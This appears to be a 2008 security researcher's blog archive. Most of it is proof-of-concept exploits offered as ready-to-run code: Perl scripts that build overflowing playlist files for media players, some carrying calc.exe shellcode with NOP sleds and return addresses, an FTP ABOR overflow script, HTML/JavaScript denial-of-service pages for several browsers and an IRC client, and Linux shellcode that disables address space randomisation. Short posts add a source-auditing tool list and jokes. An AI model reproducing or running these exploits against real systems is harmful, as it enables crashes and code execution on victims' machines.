30 November, 2008
23 November, 2008
Nero ShowTime v5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC
#!/usr/bin/perl -w
#
# Nero ShowTime v5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC
#
# Summary: Nero ShowTime provides you with a high-performance software DVD player
# that takes you to a new dimension in DVD's. Its cinema-like sound and excellent image
# quality for all digital pictures make an adventure of every film! What is more, Nero ShowTime
# supports all DVD-Video formats and can play them from a disc and from the hard drive.
#
# Product web page: http://www.nero.com
#
# Description: Nero ShowTime is prone to a buffer-overflow vulnerability because it fails
# to perform adequate boundary checks on user-supplied input. Successfully exploiting
# these issues may allow remote attackers to execute arbitrary code in the context of the
# application. Failed exploit attempts will cause denial-of-service conditions. Nero ShowTime
# 5.0.15.0 is vulnerable, prior versions may also be affected.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [ t00t ] gmail [ d0t ] com
#
# 24.11.2008
#
$filename = "Jackie_Chan.m3u";
$mana = "A" x 432809;
print "\n\n[*] Creating evul playlist: $filename ...\r\n";
sleep(3);
open(m3u, ">./$filename") || die "\n\aCannot open $filename: $!";
print m3u "$mana";
close (m3u);
print "\n[*] Playlist file successfully created!\r\n";
24 October, 2008
KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)
<!--
KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)
Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
the contribution of many IRC addicted developers around the world.
Product web page: http://www.kvirc.net/
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
24.10.2008
-->
<html>
<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>
<head>
<body>
<center> <br /> <br /> <strong>Warning ! :)</strong> </center>
<body bgcolor="#FFFF00">
<script type="text/javascript">
alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");
function poc()
{
window.location.href = "irc://A:%n -i";
}
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (answ == true)
{
poc();
}
else
{
window.location.href = "http://www.kvirc.net";
}
</script> </body> </head> </html>
-------------------------------------------
PoC: http://zeroscience.org/codes/kvirc_fs.html
14 October, 2008
Eserv/3.x FTP Server (ABOR) Remote Stack Overflow PoC
#!/usr/bin/perl
#
# Eserv/3.x FTP Server (ABOR) Remote Stack Overflow PoC
#
# Summary: Eserv/3.x - Mail, News, Web and Proxy Servers - Mail
# Server (SMTP, IMAP4 and POP3) - News Server (NNTP) - Web Server
# (HTTP) - FTP Server - Proxy Servers (HTTP, FTP, Socks, etc) - Finger
# Server - Built-in scheduler and dialer.
#
# Product web page: http://www.eserv.ru/ | www.etype.net/eserv/
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail.com
#
# http://www.zeroscience.org
#
# 14.10.2008
#
use Net::FTP;
$ipaddr = "127.0.0.1";
$mana = "..?" x 13000;
$user = "admin";
$pass = "nimda";
$port = 21;
$ftp = Net::FTP->new("$ipaddr", Debug => 0) || die "Cannot connect to $ipaddr on port $port: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;
$ftp->abor($mana);
$ftp->quit;
print "\nDone!\n";
---------------------------------------------------
http://www.milw0rm.com/exploits/6752
http://www.packetstormsecurity.org/filedesc/eserv-overflow.txt.html
http://www.securityfocus.com/bid/31753/
03 October, 2008
VBA32 Personal Antivirus 3.12.8.x (malformed archive) Denial of Service PoC
Desc: VBA32 (VirusBlokAda) Personal Version 3.12.8.x suffers from a denial of service vulnerability that causes memory corruption and causing the software to crash while scanning a malformed archive.
Product web page: http://www.anti-virus.by/en/personal.html
Tested on Microsoft Windows XP SP2 (English)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [m00t] com
http://www.zeroscience.org
03.10.2008
PoC: http://zeroscience.org/codes/vba32_poc.rar
http://www.milw0rm.com/exploits/6658
http://packetstormsecurity.org/filedesc/vba32-poc-tgz.html
http://www.sebug.net/exploit/4800/
http://www.securityfocus.com/bid/31560
http://heapoverflow.com/f0rums/public/9134-vba32-personal-antivirus-3-12-8-x-malformed-archive-dos-exploit.html
17 September, 2008
15 September, 2008
CoolCon v0.2 Released
Released my Cool Converter :P "CoolCon v0.2" written in C language, 862 lines of code with a nice interface and new features added.
Conversion from Text to: Binary, Decimal, Octal, Hexadecimal, ASCII, ROT13(vice versa)
Conversion from Decimal to: Binary, Octal, Hexadecimal
Conversion from Binary to: Decimal, Octal, Hexadecimal
Conversion from Text to URL Unicode UTF-8 (new).
Included: ASCII table and Base64 table output
I know i said that the new version will have base64 conversion and vigenere cipher but..no time so enjoy and till next release ;)
CoolCon v0.2 Download link: http://www.packetstormsecurity.org/Win/CoolCon0.2.rar
t00t :D
09 September, 2008
Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
Summary: Maxthon Browser is a powerful tabbed browser built for
all users. Besides basic browsing functionality, Maxthon Browser
provides a rich set of features to improve your surfing experience.
Product web page: http://www.maxthon.com
by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
09.09.2008
-->
<html>
<title>Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC</title>
<head>
<body>
<script type="text/javascript">
alert("Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC\n\n\t\tby LiquidWorm");
function thricer()
{
title="Attack";
url="http://www.thrice.net/";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (answ == true)
{
for (x=0; x<x+1; x++)
thricer();
}
else
{
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script>
</body>
</head>
</html>
http://www.packetstormsecurity.org/filedesc/maxthon-dos.txt.html
http://www.milw0rm.com/exploits/6434
http://www.securityfocus.com/bid/31098
http://www.zeroscience.org/codes/maxthon_dos.txt
Test: CLICK (warned)
07 September, 2008
SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC
Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC
Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.
Product web page: http://www.seamonkey-project.org/
Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag multiple times (>24). Successfully exploiting
these issues allows remote attackers to cause the application
to freeze, denying service to legitimate users.
Tested on Microsoft Windows XP SP2 (English)
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
08.09.2008
-->
<html>
<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>
<head>
<body>
<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />
<center>
<script type="text/javascript">
document.write("<kbd>Wooow Camel..!! WOW!</kbd>");
function t00t()
{
for(i=0; i < 25; i++)
{
document.write("<marquee>");
}
}
alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");
var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (b0x == true)
{
t00t();
}
else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script> </center> </body> </head> </html>
http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html
http://www.securityfocus.com/bid/31070
Test: http://www.zeroscience.org/codes/seamonkey_dos.html
06 September, 2008
Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit
http://www.milw0rm.com/exploits/6391
http://www.packetstormsecurity.org/filedesc/flockweb-dos.txt.html
http://www.securityfocus.com/bid/31044/
Test: http://www.zeroscience.org/codes/flock_dos.html
PoC follows:
-------------------------------------------------
<!----------------------------------------------0
||
| Flock Web Browser 1.2.5 Remote DoS Exploit|
| |
| by Gjoko 'LiquidWorm' Krstic|
| |
| http://www.zeroscience.org|
| |
| liquidworm [t00t] gmail.com|
| |
| 06.09.2008|
| |
0----------------------------------------------->
<html>
<title>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</Title>
<head>
<br /><br />
<center><h1><strong><kbd>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</kbd></strong></h1>
<br /><h2><kbd>Freezed/Locked - Not Responding...</kbd><h2></center>
<body>
<script type="text/javaScript">
function Xploit()
{
title="DoS";
url="http://www.destr0y.net";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
for (n=0; n<n+1; n++)
Xploit();
</script>
<center>
<a href="http://www.zeroscience.org/codes/flock_dos.html"><i>http://www.zeroscience.org/codes/flock_dos.html</i></a>
</center>
</body> </head> </html>
<!-- thanks to Gianni Amato -->
------------------------------------------
05 September, 2008
Google Chrome Browser 0.2.149.27 Denial of Service Exploit
Test: http://zeroscience.org/codes/goodos.html
http://packetstormsecurity.org/filedesc/google-chrome-dos2.txt.html
<!-----------------------------------------------
| |
| Vulnerability discovered by Rishi Narang |
| |
| Exploit by LiquidWorm, September 2008 |
| |
| http://www.zeroscience.org |
| |
| liquidworm [t00t] gmail.com |
| |
------------------------------------------------>
<html>
<title>Google Chrome DoS Exploit</title>
<head>
<br />
<br />
<script type="text/javascript">
alert("Google Chrome Browser 0.2.149.27 Denial of Service Exploit");
var box = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (box == true)
{
document.write("Just point to the hyperlink... <a href=\"jox:%\"><strong>HERE</strong></a>");
}
else { alert("Ok Dude!"); window.location.href = "http://www.zeroscience.org"; }
</script>
</head>
</html>
25 August, 2008
Linux/x86 (Fedora 8) setuid(0) + setgid(0) + execve("echo 0 > /proc/sys/kernel/randomize_va_space") Shellcode
* Linux/x86 (Fedora 8) setuid(0) + setgid(0) + execve("echo 0 > /proc/sys/kernel/randomize_va_space")
*
* by LiquidWorm
*
* 2008 (c) www.zeroscience.org
*
* liquidworm [at] gmail.com
*
* 79 bytes.
*
*/
char sc[] =
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80
"\x6a\x2e" // push $0x2e
"\x58" // pop %eax
"\x53" // push %ebx
"\xcd\x80" // int $0x80
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x70\x61\x63\x65" // push $0x65636170
"\x76\x61\x5f\x73" // push $0x735f6176
"\x69\x7a\x65\x5f" // push $0x5f657a69
"\x6e\x64\x6f\x6d" // push $0x6d6f646e
"\x6c\x2f\x72\x61" // push $0x61722f6c
"\x65\x72\x6e\x65" // push $0x656e7265
"\x73\x2f\x2f\x6b" // push $0x6b2f2f73
"\x2f\x2f\x73\x79" // push $0x79732f2f
"\x70\x72\x6f\x63" // push $0x636f7270
"\x20\x3e\x20\x2f" // push $0x2f203e20
"\x68\x6f\x20\x30" // push $0x30206f68
"\x2f\x2f\x65\x63" // push $0x63652f2f
"\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80
int main()
{
int (*fp)() = (int(*)())sc;
printf("bytes: %u\n", strlen(sc));
fp();
}
http://www.sebug.net/exploit/4455/
http://pooh.gr.jp/item-5674.html
http://www.milw0rm.com/shellcode/6268
http://packetstormsecurity.org/filedesc/linux-set.txt.html
VUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit
# Title: VUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit
#
# Summary: VUPlayer is a freeware multi-format audio player for Windows
#
# Product web page: http://www.vuplayer.com/vuplayer.php
#
# Desc: VUPlayer 2.49 suffers from buffer overflow vulnerability that can be
# exploited remotely using user intereaction or crafting. It fails to perform
# adequate boundry condition of the user input file (1016 bytes), allowing us
# to overwrite the EIP, ECX and EBP registers. Successful exploitation executes
# calc.exe, failed attempt resolve in DoS.
#
#
# ---------------------------------WinDbg-------------------------------------
#
# (e7c.c40): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000001 ecx=41414141 edx=00da5c98 esi=0050b460 edi=0012ee24
# eip=41414141 esp=0012eab8 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
# 41414141 ?? ???
#
# ----------------------------------------------------------------------------
#
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Greg Linares & Expanders in version 2.44 (2006)
#
# Refs:
#
# - cVE: CVE-2006-6251
# - MILW0RM:2872
# - MILW0RM:2870
# - CERT-VN:VU#311192
# - BID:21363
# - FRSIRT:ADV-2006-4783
# - SECUNIA:23182
# - XF:vuplayer-plsm3u-bo(30629)
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail.com
#
# http://www.zeroscience.org
#
# 18.08.2008
#
print "\n\n";
print "=" x 80;
print "\n\n";
print "\tVUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit\n";
print "\t\t by LiquidWorm
print "=" x 80;
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
$SHELLCODE = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff".
"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56".
"\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30".
"\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43".
"\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32".
"\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42".
"\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42".
"\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x34".
"\x4e\x43\x4b\x58\x4e\x57\x45\x30\x4a\x57".
"\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31".
"\x4b\x58\x4f\x45\x42\x52\x41\x30\x4b\x4e".
"\x49\x54\x4b\x48\x46\x53\x4b\x38\x41\x30".
"\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a".
"\x46\x38\x42\x4c\x46\x37\x47\x50\x41\x4c".
"\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x50".
"\x45\x57\x45\x4e\x4b\x38\x4f\x55\x46\x52".
"\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30".
"\x4b\x54\x4b\x58\x4f\x55\x4e\x51\x41\x50".
"\x4b\x4e\x4b\x38\x4e\x51\x4b\x38\x41\x30".
"\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30".
"\x43\x4c\x41\x33\x42\x4c\x46\x36\x4b\x38".
"\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37".
"\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x4a\x36".
"\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x38".
"\x42\x4b\x42\x50\x42\x50\x42\x30\x4b\x38".
"\x4a\x36\x4e\x53\x4f\x55\x41\x53\x48\x4f".
"\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38".
"\x42\x4c\x4b\x57\x42\x35\x4a\x36\x4f\x4e".
"\x50\x4c\x42\x4e\x42\x56\x4a\x56\x4a\x39".
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f".
"\x47\x4e\x43\x36\x41\x56\x4e\x36\x43\x36".
"\x50\x32\x45\x36\x4a\x57\x45\x46\x42\x50".
"\x5a";
$FILE = "TETOVIRANJE.m3u";
$GARBAGE = "\x4A" x 461;
$NOPSLED = "\x90" x 200;
$RET = "\xC0\xE6\x12\x00";
print "\n\n[-] Buffering malicious playlist file. Please wait...\r\n";
sleep (5);
open (BOF, ">./$FILE") || die "\nCan't open $FILE: $!";
print BOF "$NOPSLED" . "$SHELLCODE" . "$GARBAGE" . "$RET";
close (BOF);
print "\n\n[+] File $FILE successfully created!\n\n";
system (pause);
Stack:
EIP:
Shellcode:
http://www.packetstormsecurity.org/filedesc/vuplayer_bof.pl.txt.html
http://www.securityfocus.com/bid/21363
Zinf 2.2.1 PLF/M3U/GQMPEG Playlist File Remote Buffer Overflow Exploit
#
# Zinf 2.2.1 PLF/M3U/GQMPEG Playlist File Remote Buffer Overflow Exploit
#
# Summary: The Zinf audio player is a simple, but powerful audio player for Linux and
# Win32. It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast HTTP
# streaming, RTP streaming, a powerful music browser, theme support and a download manager.
#
# Product web page: http://www.zinf.org/
#
# Desc: Zinf is reported prone to a remote buffer overflow vulnerability when processing
# malformed playlist files. This issue exists due to insufficient boundary checks performed
# by the application and may allow an attacker to gain unauthorized access to a vulnerable
# computer. Reportedly, this issue affects Zinf version 2.2.1 for Windows. Zinf version 2.2.5
# for Linux is reportedly fixed, however, this is not confirmed at the moment.
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Refs:
#
# - http://www.securityfocus.com/bid/11248
# - http://www.milw0rm.com/exploits/559
#
# Vulnerability discovered by Luigi Auriemma (24.11.2004)
#
# Coded by Gjoko "LiquidWorm" Krstic
#
# liquidworm [At] gmail.com
#
# http://www.zeroscience.org
#
# 14.08.2008
#
$buffer = "A" x 1300;
$ret = "BBBB";
open(pls, ">./zinf_list.pls");
print pls $buffer.$ret;
print "\n--> PoC Playlist created...\n";
08 August, 2008
BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#!/usr/bin/perl
#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.
# It can provide superior video and audio(Dolby) quality, together with other
# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image
# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file
# you have the codec installed for.The DVD player software can be extensive
# compatible with hardware,which is operated stable,smoothly under Windows98,
# 98SE, Me, 2000, XP, VISTA.
#
# Product web Page: http://www.blazevideo.com/dvd-player/index.htm
#
# Desc: BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be
# exploited via crafted PLF playlist file localy and remotely. It fails to
# perform boundry checking of the user input file, allowing the EIP to be
# overwritten, thus, controling the next insctruction of the software. After
# succesfull exploitation, calc.exe will be executed. Failed attempts will
# result in Denial Of Service (DoS).
#
# WinDgb(output):
#
# - (4d8.f80): Access violation - code c0000005 (first chance)
# - First chance exceptions are reported before any exception handling.
# - This exception may be expected and handled.
# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc
# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
# - 41414141 ?? ???
#
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by: Parvez Anwar and Greg Linares
#
# Refs:
#
# - http://secunia.com/advisories/23041/
# - http://www.frsirt.com/english/advisories/2006/4764
# - http://xforce.iss.net/xforce/xfdb/30567
# - http://osvdb.org/30770
# - http://www.securityfocus.com/bid/21337/
# - http://www.milw0rm.com/exploits/2880
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm@gmail.com
#
# http://www.zeroscience.org
#
# 08.08.2008
#
print "\n|==================================================================|\n";
print "| |\n";
print "| BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |\n";
print "| by LiquidWorm|\n";
print "| |\n";
print "|==================================================================|\n\n";
$nop = "\x90" x 96;
# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "\x29\xc9\x83\xe9\xdd\xd9\xee".
"\xd9\x74\x24\xf4\x5b\x81\x73".
"\x13\x7d\xe6\xe7\x4e\x83\xeb".
"\xfc\xe2\xf4\x81\x0e\xa3\x4e".
"\x7d\xe6\x6c\x0b\x41\x6d\x9b".
"\x4b\x05\xe7\x08\xc5\x32\xfe".
"\x6c\x11\x5d\xe7\x0c\x07\xf6".
"\xd2\x6c\x4f\x93\xd7\x27\xd7".
"\xd1\x62\x27\x3a\x7a\x27\x2d".
"\x43\x7c\x24\x0c\xba\x46\xb2".
"\xc3\x4a\x08\x03\x6c\x11\x59".
"\xe7\x0c\x28\xf6\xea\xac\xc5".
"\x22\xfa\xe6\xa5\xf6\xfa\x6c".
"\x4f\x96\x6f\xbb\x6a\x79\x25".
"\xd6\x8e\x19\x6d\xa7\x7e\xf8".
"\x26\x9f\x42\xf6\xa6\xeb\xc5".
"\x0d\xfa\x4a\xc5\x15\xee\x0c".
"\x47\xf6\x66\x57\x4e\x7d\xe6".
"\x6c\x26\x41\xb9\xd6\xb8\x1d".
"\xb0\x6e\xb6\xfe\x26\x9c\x1e".
"\x15\x16\x6d\x4a\x22\x8e\x7f".
"\xb0\xf7\xe8\xb0\xb1\x9a\x85".
"\x86\x22\x1e\xc8\x82\x36\x18".
"\xe6\xe7\x4e";
$ret = "\x78\x53\xbe\x01";
$payload = $nop.$shellcode.$ret;
open(plf, ">./The_Dark_Knight.plf");
print plf "$payload";
print "\n--> Playlist: The_Dark_Knight.plf succesfully created...Enjoy!\n\n";
print "\n...t00t w00t!\n\a\n";
# August, 2008
-------------------------------------
http://www.milw0rm.com/exploits/6217
http://zeroscience.org/codes/blazedvd_bof.txt
http://www.securityfocus.com/bid/21337/exploit
http://www.xakep.ru/post/44818/BlazeDVD-Remote-Buffer-Overflow-Exploit.txt
CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
PoC:
--------------------------
#!/usr/bin/perl
#
# CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
# Coded by Gjoko "LiquidWorm" Krstic
# liquidworm [At] gmail.com
# http://www.zeroscience.org
#
$buffer = "J" x 520000; open(m3u, ">./evil_list.m3u"); # or .pls
print m3u "$buffer";
print "\n--> Evil Playlist created... Have fun!\n";
# July, 2008
---------------------------------------------------------------------------------------------------------------------
(ea0.d4c): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00003e84 ebx=02890048 ecx=00032310 edx=02890049 esi=0007ef41 edi=0012cb2c
eip=0043fb37 esp=0012c308 ebp=0012cf4c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
image00400000+0x3fb37:
0043fb37 8501 test dword ptr [ecx],eax ds:0023:00032310=00000000
-------------------------------------------------------------------------------------------
http://zeroscience.org/codes/powerdvd_bof.txt
http://www.securityfocus.com/bid/30341/
http://www.packetstormsecurity.org/filedesc/powerdvd_bof.pl.txt.html
http://www.juniper.net/security/auto/vulnerabilities/vuln30341.html
http://www.venustech.com.cn/NewsInfo/124/1959.Html
http://www.maestro-sec.com/forum/viewtopic.php?t=588&f=19
http://www.hwupgrade.it/forum/showthread.php?p=23436246
24 June, 2008
List of Source Code Auditing tools
.TEST - [ C#, VB.NET, MC++ ] - http://www.parasoft.com/jsp/products.jsp
ASTRÉE - [ C ] - http://www.astree.ens.fr
Bandera - [ Java ] - http://bandera.projects.cis.ksu.edu/
BLAST - [ C ] - http://mtc.epfl.ch/software-tools/blast/
BOON - [ C ] - http://www.cs.berkeley.edu/~daw/boon/
C Code Analyzer (CCA) - [ C ] - http://www.drugphish.ch/~jonny/cca.html
C++test - [ C++ ] - http://www.parasoft.com/jsp/products.jsp
CCMetrics - [ C#, VB.NET ] - http://www.serviceframework.com/jwss/utility,ccmetrics,utility.aspx
Checkstyle - [ Java ] - http://checkstyle.sourceforge.net/
CodeCenter - [ C ] - http://www.ics.com/products/centerline/codecenter/features.html
CodeScan - [ .ASP, PHP ] - http://www.codescan.com/
CodeSecure - [ PHP, Java ] - http://www.armorize.com/corpweb/en/products/codesecure
CodeSonar - [ C, C++ ] - http://www.grammatech.com/products/codesonar/overview.html
CQual - [ C ] - http://www.cs.umd.edu/~jfoster/cqual
Csur - [ C ] - http://www.lsv.ens-cachan.fr/csur/
Dehydra - [ C++ ] - http://wiki.mozilla.org/Dehydra_GCC
DevInspect - [ C#, Visual Basic, JavaScript, VB Script] - http://www.spidynamics.com/products/devinspect/
DevPartner SecurityChecker - [ C#, Visual Basic ] - http://www.compuware.com/products/devpartner/securitychecker.htm
DoubleCheck - [ C, C++ ] - http://www.ghs.com/products/doublecheck.html
FindBugs - [ Java ] - http://findbugs.sourceforge.net/
FlawFinder - [ C, C++ ] - http://www.dwheeler.com/flawfinder/
Fluid - [ Java ] - http://www.fluid.cs.cmu.edu/
Frama-C - [ C ] - http://frama-c.cea.fr/
ftnchek - [ FORTRAN ] - http://www.dsm.fordham.edu/~ftnchek/
FxCop - [ .NET ] - http://code.msdn.microsoft.com/codeanalysis
g95-xml - [ FORTRAN ] - http://g95-xml.sourceforge.net/
ITS4 - [ C, C++ ] - http://www.cigital.com/its4/
Jlint - [ Java ] - http://artho.com/jlint/
JsLint - [ JavaScript ] - http://www.jslint.com/
Jtest - [ Java ] - http://www.parasoft.com/jsp/products.jsp
KlocWork / K7 - [ C, C++, Java ] - http://www.klocwork.com/products/k7_security.asp
LAPSE - [ Java ] - http://www.owasp.org/index.php/Category:OWASP_LAPSE_Project
MOPS - [ C ] - http://www.cs.berkeley.edu/~daw/mops/
MSSCASI - [ ASP ] - http://www.microsoft.com/downloads/details.aspx?FamilyId=58A7C46E-A599-4FCB-9AB4-A4334146B6BA&displaylang=en
MZTools - [ VB6, VBA ] - http://www.mztools.com/index.aspx/
Oink - [ C++ ] - http://www.cubewano.org/oink
Ounce - [ C, C++, Java, JSP, ASP.NET, VB.NET, C# ] - http://www.ouncelabs.com/accurate-complete-results.html
Perl-Critic - [ Perl ] - http://search.cpan.org/dist/Perl-Critic/
PLSQLScanner 2008 - [ PLSQL ] - http://www.red-database-security.com/software/plsqlscanner.html
PHP-Sat - [ PHP ] - http://www.program-transformation.org/PHP/PhpSat
Pixy - [ PHP ] - http://pixybox.seclab.tuwien.ac.at/pixy/index.php
PMD - [ Java ] - http://pmd.sourceforge.net/
PolySpace - [ Ada, C, C++ ] - http://www.polyspace.com/products.htm
PREfix & PREfast - [ C, C++ ] - http://support.microsoft.com/vst
Prevent - [ C, C++ ] - http://www.coverity.com/html/coverity-software-quality-products.html
PyChecker - [ Python ] - http://pychecker.sourceforge.net/
pylint - [ Python ] - http://www.logilab.org/project/pylint
QA-C, QA-C++, QA-J - [ C, C++, Java, FORTRAN ] - http://www.programmingresearch.com/PRODUCTS.html
QualityChecker - [ Visual Basic 6 ] - http://d.cr.free.fr/
RATS - [ C, C++, Perl, PHP, Python ] - http://www.fortify.com/security-resources/rats.jsp
RSM - [ C, C++, C#, Java ] - http://msquaredtechnologies.com/m2rsm/
Smatch - [ C ] - http://smatch.sourceforge.net/
SCA - [ ASP.NET, C, C++, C#, Java, JSP, PL/SQL, T-SQL, VB.NET, XML ] - http://www.fortifysoftware.com/products/sca/
Skavenger - [ PHP ] - http://code.google.com/p/skavenger/
smarty-lint - [ PHP ] - http://code.google.com/p/smarty-lint/
soot - [ Java ] - http://www.sable.mcgill.ca/soot/
Source Monitor - [ C#, VB.NET ] - http://www.campwoodsw.com/sm20.html
SPARK - [ Ada ] - http://www.praxis-his.com/sparkada/spark.asp
Spike PHP Security Audit Tool - [ PHP ] - http://developer.spikesource.com/projects/phpsecaudit/
Splint - [ C ] - http://www.splint.org/
SWAAT - [ PHP, ASP.NET, JSP, Java ] - http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project
UNO - [ C ] - http://spinroot.com/uno/">
vil - [ C#, VB.NET ] - http://www.1bot.com/
Viva64 - [ C++ ] - http://www.viva64.com/
xg++ - [ C ] - http://www.stanford.edu/~engler/mc-osdi.pdf
YTKScan Java - [ Java ] - http://www.cam.org/~droujav/y2k/Y2KScan.html
t00t w00t ;)
23 June, 2008
Risk assessment
http://en.wikipedia.org/wiki/Risk_assessment
01 March, 2008
Linus Torvalds jokes
Linus Torvalds can run kill -9 and kill Chuck Norris.
Linus Torvalds doesn't die, he simply returns zero.
Linus Torvalds first written program had artificial intelligence.
Linus can divide by zero.
Linus Torvalds runs Linux on his wristwatch and toster.
Linus Torvalds doesn't receive error messages.
There is no theory of probability, just a list of events that Linus Torvalds allows to occur.
Linus Torvalds does not sleep. He hacks.
Linus surfs the web using nothing but netcat.
Linus Torvalds can play 3D games in his head by interpreting the source code in real-time.
Linus made the red pill.
Linus Torvalds didn't learn from the University of Helsinki, the University of Helsinki learned from Linus Torvalds.
Linus Torvalds once developed a programming language so good that it makes python look like punch cards.
Linus Torvalds doesn't need to boot.
Linus is real, unless declared Integer.
